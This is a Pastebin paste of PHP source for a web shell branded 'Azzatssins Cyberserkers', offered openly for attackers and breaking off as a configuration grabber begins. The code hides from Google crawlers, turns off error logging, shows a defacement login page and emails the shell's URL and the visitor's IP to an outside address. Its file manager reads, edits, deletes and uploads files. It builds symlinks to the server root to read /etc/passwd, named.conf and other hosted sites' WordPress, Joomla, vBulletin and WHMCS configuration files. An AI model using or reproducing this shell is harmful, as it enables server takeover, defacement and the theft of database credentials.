API tools faq
paste
EddieKidiw

Web Shell Azzatssins Cyberserkers Decoder By Eddie Kidiw

EddieKidiw
Nov 1st, 2015
575
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 39.01 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. /* (Web Shell Azzatssins Cyberserkers of Psychopath) */
  4. $auth_pass = "6d768f2f59ff1e5a8b55a3a39bcbda89";
  5. $color = "#00ff00";
  6. $default_action = 'FilesMan';
  7. @define('SELF_PATH', __FILE__);
  8. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  9. header('HTTP/1.0 AZZATSSINS');
  10. exit;
  11. }
  12. @session_start();
  13. @error_reporting(0);
  14. @ini_set('error_log',NULL);
  15. @ini_set('log_errors',0);
  16. @ini_set('max_execution_time',0);
  17. @ini_set('display_errors', 0);
  18. @set_time_limit(0);
  19. @set_magic_quotes_runtime(0);
  20. @define('VERSION', '2.1');
  21. if( get_magic_quotes_gpc() ) {
  22. function stripslashes_array($array) {
  23. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  24. }
  25. $_POST = stripslashes_array($_POST);
  26. }
  27. function printLogin() {
  28. ?>
  29. <meta content=HACKED-BY-AZZATSSINS-CYBERSERKERS-OF-PSYCHOPATH name=description>
  30. <title>AZZATSSIN'S CYBERSERKER'S</title>
  31. <center>
  32. <h1><i>~# HACKED BY AZZATSSIN'S #~</i></h1>
  33. <br /><table><border><nobr><img src=https://scontent-iad3-1.xx.fbcdn.net/hphotos-xfa1/t31.0-8/11741021_1583605078555010_3385696737335881837_o.jpg><br /><br /><font color=violet>~</font><font color=lime>*</font><font color=red>What I want is not peace, but the advantages and beliefs</font><font color=lime>*</font><font color=violet>~</font></center>
  34. <style>
  35. input { margin:0;background-color:#fff;border:1px solid #fff; }
  36. </style>
  37. <center>
  38. <form method=post>
  39. <input type=password name=pass>
  40. </form></center>
  41. <?php
  42. exit;
  43. }
  44. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  45. if( empty( $auth_pass ) ||
  46. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  47. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  48. else
  49. printLogin();
  50.  
  51.  
  52. @session_start();
  53. @set_time_limit(0);
  54. @error_reporting(0);
  55. ini_set('memory_limit', '64M');
  56. header('Content-Type: text/html; charset=UTF-8');
  57. @mkdir('bt',0777);
  58. $email = 'cyberserkers@gmail.com';
  59.  
  60. @ini_set('output_buffering',0);
  61. @ini_set('display_errors', 0);
  62. set_time_limit(0);
  63. ini_set('memory_limit', '64M');
  64. header('Content-Type: text/html; charset=UTF-8');
  65. $tujuanmail = 'cyberserkers@gmail.com';
  66. $x_path="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  67. $pesan_alert="Haibos$x_path Telah Di Akses Oleh => [ ".$_SERVER['REMOTE_ADDR']." ]";
  68. mail($tujuanmail, "cyberserkers@gmail.com", $pesan_alert ,"From:");
  69.  
  70.  
  71. if(get_magic_quotes_gpc()){
  72. foreach($_POST as $key=>$value){
  73. $_POST[$key] = stripslashes($value);
  74. }
  75. }
  76. echo '<title>+++AZZATSSINS+++</title>
  77. <body bgcolor=silver><br>
  78. <center><img src="http://azzat.wap.mu/files/1049320/az-bn-idb.png"></center><br>
  79. <center>
  80. <fieldset class=important><legend><center><h1><font color="black"><i><b>CYBERSERKERS</b></i></font></h1></center></legend>
  81. <table width="40)" border="0" cellpadding="2" cellspacing="1" align="center">
  82. <tr><td>Current Path : ';
  83. if(isset($_GET['path'])){
  84. $path = base64_decode($_GET['path']);
  85. }else{
  86. $path = getcwd();
  87. }
  88. $pathen = base64_encode($path);
  89. $path = str_replace('\\','/',$path);
  90. $paths = explode('/',$path);
  91.  
  92. foreach($paths as $id=>$pat){
  93. if($pat == '' && $id == 0){
  94. $a = true;
  95. echo '<a href="?path='.base64_encode("/").'">/</a>';
  96. continue;
  97. }
  98. if($pat == '') continue;
  99. echo '<a href="?path=';
  100. $linkpath = '';
  101. for($i=0;$i<=$id;$i++){
  102. $linkpath .= "$paths[$i]";
  103. if($i != $id) $linkpath .= "/";
  104. }
  105. echo base64_encode($linkpath);
  106. echo '">'.$pat.'</a>/';
  107. }
  108. if(isset($_GET['filesrc'])){
  109. echo "<tr><td>Current File : ";
  110. echo base64_decode($_GET['filesrc']);
  111. echo '</tr></td></table><br />';
  112. echo('<pre>'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'</pre>');
  113. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  114. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  115. if($_POST['opt'] == 'chmod'){
  116. if(isset($_POST['perm'])){
  117. if(chmod($_POST['path'],$_POST['perm'])){
  118. echo '<font color="green">Change Permission Done.</font><br />';
  119. }else{
  120. echo '<font color="red">Change Permission Error.</font><br />';
  121. }
  122. }
  123. echo '<form method="POST">
  124. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  125. <input type="hidden" name="path" value="'.$_POST['path'].'">
  126. <input type="hidden" name="opt" value="chmod">
  127. <input type="submit" value="Go" />
  128. </form>';
  129. }elseif($_POST['opt'] == 'rename'){
  130. if(isset($_POST['newname'])){
  131. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  132. echo '<font color="green">Change Name Done.</font><br />';
  133. }else{
  134. echo '<font color="red">Change Name Error.</font><br />';
  135. }
  136. $_POST['name'] = $_POST['newname'];
  137. }
  138. echo '<form method="POST">
  139. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  140. <input type="hidden" name="path" value="'.$_POST['path'].'">
  141. <input type="hidden" name="opt" value="rename">
  142. <input type="submit" value="Go" />
  143. </form>';
  144. }elseif($_POST['opt'] == 'edit'){
  145. if(isset($_POST['src'])){
  146. $fp = fopen($_POST['path'],'w');
  147. if(fwrite($fp,$_POST['src'])){
  148. echo '<font color="green">Edit File Done.</font><br />';
  149. }else{
  150. echo '<font color="red">Edit File Error.</font><br />';
  151. }
  152. fclose($fp);
  153. }
  154. echo '<form method="POST">
  155. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  156. <input type="hidden" name="path" value="'.$_POST['path'].'">
  157. <input type="hidden" name="opt" value="edit">
  158. <input type="submit" value="Go" />
  159. </form>';
  160. }
  161. echo '</center>';
  162. }else{
  163. echo '</table><br /><center>';
  164. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  165. if($_POST['type'] == 'dir'){
  166. if(rmdir($_POST['path'])){
  167. echo '<font color="green">Delete Dir Done.</font><br />';
  168. }else{
  169. echo '<font color="red">Delete Dir Error.</font><br />';
  170. }
  171. }elseif($_POST['type'] == 'file'){
  172. if(unlink($_POST['path'])){
  173. echo '<font color="green">Delete File Done.</font><br />';
  174. }else{
  175. echo '<font color="red">Delete File Error.</font><br />';
  176. }
  177. }
  178. }
  179. echo '</center>';
  180. $scandir = scandir($path);
  181. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  182. <tr class="first">
  183. <td><center>Name</center></td>
  184. <td><center>Size</center></td>
  185. <td><center>Permissions</center></td>
  186. <td><center>Options</center></td>
  187. </tr>';
  188.  
  189. foreach($scandir as $dir){
  190. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  191. $dirlink = base64_encode("$path/$dir");
  192. echo "<tr>
  193. <td><a href=\"?path=$dirlink\">$dir</a></td>
  194. <td><center>--</center></td>
  195. <td><center>";
  196. if(is_writable("$path/$dir")) echo '<font color="green">';
  197. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  198. echo perms("$path/$dir");
  199. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  200.  
  201. echo "</center></td>
  202. <td><center><form method=\"POST\" action=\"?option&path=$pathen\">
  203. <select name=\"opt\">
  204. <option value=\"\"></option>
  205. <option value=\"delete\">Delete</option>
  206. <option value=\"chmod\">Chmod</option>
  207. <option value=\"rename\">Rename</option>
  208. </select>
  209. <input type=\"hidden\" name=\"type\" value=\"dir\">
  210. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  211. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  212. <input type=\"submit\" value=\">\" />
  213. </form></center></td>
  214. </tr>";
  215. }
  216. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  217. foreach($scandir as $file){
  218. if(!is_file("$path/$file")) continue;
  219. $size = filesize("$path/$file")/1024;
  220. $size = round($size,3);
  221. if($size >= 1024){
  222. $size = round($size/1024,2).' MB';
  223. }else{
  224. $size = $size.' KB';
  225. }
  226. $filelink = base64_encode("$path/$file");
  227. echo "<tr>
  228. <td><a href=\"?filesrc=$filelink&path=$pathen\">$file</a></td>
  229. <td><center>".$size."</center></td>
  230. <td><center>";
  231. if(is_writable("$path/$file")) echo '<font color="green">';
  232. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  233. echo perms("$path/$file");
  234. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  235. echo "</center></td>
  236. <td><center><form method=\"POST\" action=\"?option&path=$pathen\">
  237. <select name=\"opt\">
  238. <option value=\"\"></option>
  239. <option value=\"delete\">Delete</option>
  240. <option value=\"chmod\">Chmod</option>
  241. <option value=\"rename\">Rename</option>
  242. <option value=\"edit\">Edit</option>
  243. </select>
  244. <input type=\"hidden\" name=\"type\" value=\"file\">
  245. <input type=\"hidden\" name=\"name\" value=\"$file\">
  246. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  247. <input type=\"submit\" value=\">\" />
  248. </form></center></td>
  249. </tr>";
  250. }
  251. echo '</table>
  252. </div>';
  253. }
  254. echo '<center><div class="info">SHELL MADE IN INDONESIA | BN-IDB TE4M <span class="gaya"><a href="http://fb.com/azzatssinz"><?php echo date("Y",time())." "BN-IDBTE4M; ?></a></span></fieldset></center></div>
  255. </BODY>
  256. ';
  257. function perms($file){
  258. $perms = @fileperms($file);
  259.  
  260. if (($perms & 0xC000) == 0xC000) {
  261. // Socket
  262. $info = 's';
  263. } elseif (($perms & 0xA000) == 0xA000) {
  264. // Symbolic Link
  265. $info = 'l';
  266. } elseif (($perms & 0x8000) == 0x8000) {
  267. // Regular
  268. $info = '-';
  269. } elseif (($perms & 0x6000) == 0x6000) {
  270. // Block special
  271. $info = 'b';
  272. } elseif (($perms & 0x4000) == 0x4000) {
  273. // Directory
  274. $info = 'd';
  275. } elseif (($perms & 0x2000) == 0x2000) {
  276. // Character special
  277. $info = 'c';
  278. } elseif (($perms & 0x1000) == 0x1000) {
  279. // FIFO pipe
  280. $info = 'p';
  281. } else {
  282. // Unknown
  283. $info = 'u';
  284. }
  285.  
  286. // Owner
  287. $info .= (($perms & 0x0100) ? 'r' : '-');
  288. $info .= (($perms & 0x0080) ? 'w' : '-');
  289. $info .= (($perms & 0x0040) ?
  290. (($perms & 0x0800) ? 's' : 'x' ) :
  291. (($perms & 0x0800) ? 'S' : '-'));
  292.  
  293. // Group
  294. $info .= (($perms & 0x0020) ? 'r' : '-');
  295. $info .= (($perms & 0x0010) ? 'w' : '-');
  296. $info .= (($perms & 0x0008) ?
  297. (($perms & 0x0400) ? 's' : 'x' ) :
  298. (($perms & 0x0400) ? 'S' : '-'));
  299.  
  300. // World
  301. $info .= (($perms & 0x0004) ? 'r' : '-');
  302. $info .= (($perms & 0x0002) ? 'w' : '-');
  303. $info .= (($perms & 0x0001) ?
  304. (($perms & 0x0200) ? 't' : 'x' ) :
  305. (($perms & 0x0200) ? 'T' : '-'));
  306.  
  307. return $info;
  308. }
  309.  
  310. ?>
  311. <?php
  312.  
  313. @mkdir('sym',0777);
  314. $htcs = "Options Indexes FollowSymLinks\nDirectoryIndex idb.phtml\nAddType txt .php\nAddHandler txt .php";
  315. $f =@fopen ('sym/.htaccess','w');
  316. fwrite($f , $htcs);
  317.  
  318.  
  319.  
  320. @symlink("/","sym/root");
  321.  
  322. $pg = basename(__FILE__);
  323.  
  324.  
  325.  
  326.  
  327. echo '<div class="cont">
  328.  
  329. <center>
  330.  
  331. [<a href="?"> Home </a>]
  332.  
  333. [<a href="?sws=sym"> User & Domains & Symlink </a>]
  334.  
  335. [<a href="?sws=sec"> Domains & Script </a>]
  336.  
  337. [ <a href="?sws=file"> Symlink File </a>]
  338.  
  339. [<a href="?sws=passwd"> Symlink Bypass </a>]
  340.  
  341. <br /><br />
  342.  
  343. [ <a href="?sws=read"> Bypass Read </a>]
  344.  
  345. [ <a href="?idb=sym2"> Symlink 2 </a>]
  346.  
  347. [ <a href="?idb=auto"> Auto tolls </a>]
  348.  
  349. [ <a href="?idb=config"> Config </a>]
  350.  
  351. </center>
  352. <br /><br /><br />
  353.  
  354.  
  355.  
  356.  
  357.  
  358.  
  359. </div>';
  360.  
  361. if(isset($_REQUEST['sws']))
  362. {
  363.  
  364. switch ($_REQUEST['sws'])
  365. {
  366.  
  367.  
  368.  
  369.  
  370.  
  371. /// Domains + Scripts ///
  372.  
  373. case 'sec':
  374.  
  375. if(!@is_file('named.txt')){
  376.  
  377. $d00m = @file("/etc/named.conf");
  378.  
  379. }else{
  380.  
  381. $d00m = @file("named.txt");
  382.  
  383.  
  384. }
  385. if(!$d00m)
  386. {
  387.  
  388. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  389. }
  390. else
  391.  
  392. {
  393. echo "<div class='tmp'>
  394. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
  395. foreach($d00m as $dom){
  396.  
  397. flush();
  398. flush();
  399.  
  400.  
  401.  
  402. if(eregi("zone",$dom)){
  403.  
  404. @preg_match_all('#zone "(.*)"#', $dom, $domsws);
  405.  
  406. flush();
  407.  
  408. if(@strlen(trim($domsws[1][0])) > 2){
  409.  
  410. $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  411.  
  412. ///////////////////////////////////////////////////////////////////////////////////
  413.  
  414. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  415. $wpp=@get_headers($wpl);
  416. $wp=$wpp[0];
  417.  
  418. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  419. $wpp2=@get_headers($wp2);
  420. $wp12=$wpp2[0];
  421.  
  422. ///////////////////////////////
  423.  
  424. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  425. $joo=@get_headers($jo1);
  426. $jo=$joo[0];
  427.  
  428.  
  429. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  430. $joo2=@get_headers($jo2);
  431. $jo12=$joo2[0];
  432.  
  433. ////////////////////////////////
  434.  
  435. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
  436. $vbb=@get_headers($vb1);
  437. $vb=$vbb[0];
  438.  
  439. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
  440. $vbb2=@get_headers($vb2);
  441. $vb12=$vbb2[0];
  442.  
  443. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
  444. $vbb3=@get_headers($vb3);
  445. $vb13=$vbb3[0];
  446.  
  447. /////////////////
  448.  
  449. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
  450. $whh2= @get_headers($wh1);
  451. $wh=$whh2[0];
  452.  
  453. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
  454. $whh2= @get_headers($wh2);
  455. $wh12=$whh2[0];
  456.  
  457. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  458. $whh3= @get_headers($wh3);
  459. $wh13=$whh3[0];
  460.  
  461. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
  462. $whh5= @get_headers($wh5);
  463. $wh15=$whh5[0];
  464.  
  465. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  466. $whh4= @get_headers($wh4);
  467. $wh14=$whh4[0];
  468.  
  469.  
  470.  
  471. ////////////////////////////////////////////////////////////////////////////////
  472.  
  473. ////////// Wordpress ////////////
  474.  
  475. $pos = strpos($wp, "200");
  476. $config="&nbsp;";
  477.  
  478. if (strpos($wp, "200") == true )
  479. {
  480. $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
  481. }
  482. elseif (strpos($wp12, "200") == true)
  483. {
  484. $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
  485. }
  486.  
  487. ///////////WHMCS////////
  488.  
  489. elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true )
  490. {
  491. $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
  492.  
  493. }
  494. elseif (strpos($wh12, "200") == true)
  495. {
  496. $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
  497. }
  498.  
  499. elseif (strpos($wh13, "200") == true)
  500. {
  501. $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
  502.  
  503. }
  504.  
  505. ///////// Joomla to 4 ///////////
  506.  
  507. elseif (strpos($jo, "200") == true)
  508. {
  509. $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
  510. }
  511.  
  512. elseif (strpos($jo12, "200") == true)
  513. {
  514. $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
  515. }
  516.  
  517. //////////vBulletin to 4 ///////////
  518.  
  519. elseif (strpos($vb, "200") == true)
  520. {
  521. $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
  522. }
  523.  
  524. elseif (strpos($vb12, "200") == true)
  525. {
  526. $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
  527. }
  528.  
  529. elseif (strpos($vb13, "200") == true)
  530. {
  531. $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
  532. }
  533.  
  534. else
  535. {
  536. continue;
  537. }
  538. flush();
  539. flush();
  540.  
  541. /////////////////////////////////////////////////////////////////////////////////////
  542.  
  543.  
  544.  
  545. $site = $user['name'] ;
  546.  
  547.  
  548.  
  549. flush();
  550.  
  551. echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
  552. <td>".$config."</td></tr>"; flush();
  553.  
  554. }
  555. }
  556. }
  557. }
  558.  
  559.  
  560.  
  561.  
  562. break;
  563.  
  564.  
  565. /// user + domine + symlink ///
  566.  
  567. case 'sym':
  568.  
  569. if(!is_file('named.txt')){
  570.  
  571. $d00m = @file("/etc/named.conf");
  572.  
  573. }else{
  574.  
  575. $d00m = @file("named.txt");
  576.  
  577.  
  578. }
  579. if(!$d00m)
  580. {
  581.  
  582. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  583. }
  584. else
  585.  
  586. {
  587. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  588. foreach($d00m as $dom){
  589.  
  590. if(eregi("zone",$dom)){
  591.  
  592. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  593.  
  594. flush();
  595.  
  596. if(strlen(trim($domsws[1][0])) > 2){
  597.  
  598. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  599.  
  600. flush();
  601.  
  602.  
  603.  
  604. $site = $user['name'] ;
  605.  
  606.  
  607. @symlink("/","sym/root");
  608.  
  609. $site = $domsws[1][0];
  610.  
  611. $ir = 'ir';
  612.  
  613. $il = 'il';
  614.  
  615. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  616. {
  617. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  618. }
  619.  
  620.  
  621. echo "
  622. <tr>
  623.  
  624. <td>
  625. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  626. </td>
  627.  
  628.  
  629. <td>
  630. ".$user['name']."
  631. </td>
  632.  
  633.  
  634.  
  635.  
  636.  
  637.  
  638. <td>
  639. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  640. </td>
  641.  
  642.  
  643. </tr></div> ";
  644.  
  645.  
  646. flush();
  647. flush();
  648.  
  649. }
  650. }
  651. }
  652. }
  653.  
  654.  
  655.  
  656.  
  657. break;
  658.  
  659.  
  660. /// file symlink ///
  661.  
  662. case 'file':
  663.  
  664. echo'
  665. The file path to symlink
  666.  
  667. <br /><br />
  668. <form method="post">
  669. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  670. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
  671. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  672.  
  673.  
  674.  
  675. </form>
  676. ';
  677.  
  678. $pfile = $_POST['file'];
  679. $symfile = $_POST['symfile'];
  680. $symlink = $_POST['symlink'];
  681.  
  682. if ($symlink)
  683. {
  684.  
  685.  
  686. @mkdir('sym1',0777);
  687. $c = "Options Indexes FollowSymLinks\nDirectoryIndex tr.phtml\nAddType txt .php\nAddHandler txt .php";
  688. $f =@fopen ('sym1/.htaccess','w');
  689. @fwrite($f , $c);
  690.  
  691. @symlink("$pfile","sym1/$symfile");
  692.  
  693. echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
  694.  
  695. }
  696.  
  697.  
  698.  
  699. break;
  700.  
  701. /// bypass read
  702.  
  703. case 'read':
  704.  
  705. echo "read /etc/named.conf";
  706. echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
  707. flush();
  708. flush();
  709.  
  710.  
  711. $file = '/etc/named.conf';
  712.  
  713.  
  714. $r3ad = @fopen($file, 'r');
  715. if ($r3ad){
  716. $content = @fread($r3ad, @filesize($file));
  717. echo "".htmlentities($content)."";
  718. }
  719. else if (!$r3ad)
  720. {
  721. $r3ad = @show_source($file) ;
  722. }
  723. else if (!$r3ad)
  724. {
  725. $r3ad = @highlight_file($file);
  726. }
  727. else if (!$r3ad)
  728. {
  729. $sm = @symlink($file,'sym.txt');
  730.  
  731.  
  732. if ($sm){
  733. $r3ad = @fopen('sym/sym.txt', 'r');
  734. $content = @fread($r3ad, @filesize($file));
  735. echo "".htmlentities($content)."";
  736.  
  737. }
  738. }
  739.  
  740.  
  741.  
  742. echo "</textarea><br /><br /><input type='submit' value='Save'/> </form>";
  743.  
  744.  
  745. if(isset($_GET['save'])){
  746.  
  747.  
  748. $cont = stripcslashes($_POST['file']);
  749.  
  750. $f = fopen('named.txt','w');
  751.  
  752. $w = fwrite($f,$cont);
  753.  
  754. if($w){
  755.  
  756. echo '<br />save has been successfully';
  757.  
  758. }
  759.  
  760. fclose($f);
  761.  
  762.  
  763.  
  764.  
  765. }
  766.  
  767.  
  768.  
  769. break;
  770.  
  771. // passwd
  772.  
  773. case 'passwd':
  774.  
  775. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  776.  
  777.  
  778. $cont = stripcslashes($_POST['file']);
  779.  
  780. if(!file_exists('passwd.txt')){
  781.  
  782. $f = @fopen('passwd.txt','w');
  783.  
  784. $w = @fwrite($f,$cont);
  785.  
  786. fclose($f);
  787. }
  788. if($w or @filesize('passwd.txt') > 0){
  789. // * SHOW * //
  790.  
  791. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
  792. flush();
  793.  
  794. $fil3 = file('passwd.txt');
  795.  
  796. foreach ($fil3 as $f){
  797.  
  798. $u=explode(':', $f);
  799. $user = $u['0'];
  800.  
  801.  
  802.  
  803. echo "
  804. <tr>
  805.  
  806.  
  807.  
  808. <td width='15%'>
  809. $user
  810. </td>
  811.  
  812.  
  813.  
  814.  
  815.  
  816.  
  817. <td width='10%'>
  818. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  819. </td>
  820.  
  821. <td width='10%'>
  822. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  823. </td>
  824.  
  825.  
  826.  
  827. </tr></div> ";
  828.  
  829.  
  830. flush();
  831. flush();
  832.  
  833.  
  834. }
  835.  
  836.  
  837.  
  838.  
  839.  
  840.  
  841. die ("</tr></div>");
  842.  
  843.  
  844. }
  845.  
  846.  
  847.  
  848.  
  849.  
  850. }
  851.  
  852.  
  853.  
  854. echo "read /etc/passwd";
  855. echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
  856. flush();
  857.  
  858. $file = '/etc/passwd';
  859.  
  860.  
  861. $r3ad = @fopen($file, 'r');
  862. if ($r3ad){
  863. $content = @fread($r3ad, @filesize($file));
  864. echo "".htmlentities($content)."";
  865. }
  866. elseif(!$r3ad)
  867. {
  868. $r3ad = @show_source($file) ;
  869. }
  870. elseif(!$r3ad)
  871. {
  872. $r3ad = @highlight_file($file);
  873. }
  874. elseif(!$r3ad)
  875. {
  876.  
  877. for($uid=0;$uid<1000;$uid++){
  878. $ara = posix_getpwuid($uid);
  879. if (!empty($ara)) {
  880. while (list ($key, $val) = each($ara)){
  881. print "$val:";
  882. }
  883. print "\n";
  884. }
  885.  
  886. }
  887.  
  888. }
  889.  
  890.  
  891. flush();
  892.  
  893.  
  894. echo "</textarea><br /><br /><input type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
  895. flush();
  896.  
  897. break;
  898.  
  899.  
  900.  
  901.  
  902. ############################ index #########################3
  903.  
  904.  
  905. case 'help':
  906.  
  907. echo "<div class='tmp'>
  908. <table align='center' width='40%'><td>function</td><td>Case</td>";
  909.  
  910.  
  911. $safe_mode = ini_get('safe_mode');
  912. if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  913.  
  914. echo "<tr><td>Safe Mode</td><td>$r</td>";
  915.  
  916. $fun = function_exists('symlink');
  917. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  918.  
  919. echo "<tr><td>function symlink</td><td>$r</td>";
  920.  
  921.  
  922. $fun = function_exists('file');
  923. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  924.  
  925. echo "<tr><td>function file</td><td>$r</td>";
  926.  
  927. $fun = function_exists('file_get_contents');
  928. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  929.  
  930. echo "<tr><td>function file_get_contents</td><td>$r</td>";
  931.  
  932. $fun = function_exists('mkdir');
  933. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  934.  
  935. echo "<tr><td>function mkdir</td><td>$r</td>";
  936.  
  937.  
  938. $fun = is_dir('sym/root');
  939. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  940.  
  941. echo "<tr><td>Permission denied</td><td>$r</td>";
  942.  
  943.  
  944. $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
  945. if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
  946.  
  947. echo "<tr><td>Forbidden</td><td>$r</td>";
  948.  
  949.  
  950.  
  951.  
  952. echo "</table></div>";
  953.  
  954.  
  955.  
  956. break;
  957. default:
  958. header("Location: $pg");
  959.  
  960.  
  961.  
  962.  
  963. }
  964.  
  965.  
  966. /// home ///
  967. }else
  968. {
  969.  
  970.  
  971. echo '<br /><br /><center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  972. echo '<input type="file" name="file" value="Choose file" size="20" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  973. if( $_POST['_upl'] == "Upload" ) {
  974. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
  975. else { echo '<br /><br />Not uploaded !!</center><br><br>'; }
  976.  
  977.  
  978. }
  979.  
  980.  
  981.  
  982. function ex($text,$a,$b){
  983. $explode = explode($a,$text);
  984. $explode = explode($b,$explode[1]);
  985. return $explode[0];
  986. }
  987. }
  988.  
  989.  
  990. ?>
  991. <?php
  992. if (isset($_GET['idb']) && ($_GET['idb'] == 'config')) {
  993. ?>
  994. <form action="?&amp;idb=config" method="post">
  995. <?php @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  996. echo '<html><head><title>PHP Config Fucker V2 | X-1N73CT & S1T1 B4RC0D3</title><style type="text/css">
  997. body {background-color: #000000; font-family: Tahoma; font-size:11pt; font-weight: bold;color: #00ff00; text-align: center;}
  998. textarea { border:1px dotted #00ff00; width: 650px; height: 420px; background-color:#0C0C0C; font-family:Tahoma; font-size:12pt; color:#FF0000 }
  999. .input {border:1px dotted #00ff00; width: 250px; background-color:#0C0C0C; font-family:Tahoma; font-size:12pt; color:#FF0000; }
  1000. .inp {border:1px dotted #00ff00; background-color:#0C0C0C; font-family:Tahoma; font-size:8pt; color:#00ff00;}
  1001. </style></head><body>
  1002. <center><b><h2><font color=#00ff00>[ <font color="#FF0000">+</font> ] Get Config [ <font color="#FF0000">+</font> ]</font></h2></b><br>
  1003. <p><font color="#C0C0C0">[ </font> Config By :<font color="#FF0000"><blink> Ez01d</blink></font> & <font color="#FF0000"><blink>R1P </blink></font><font color="#C0C0C0"> ]</font></p>
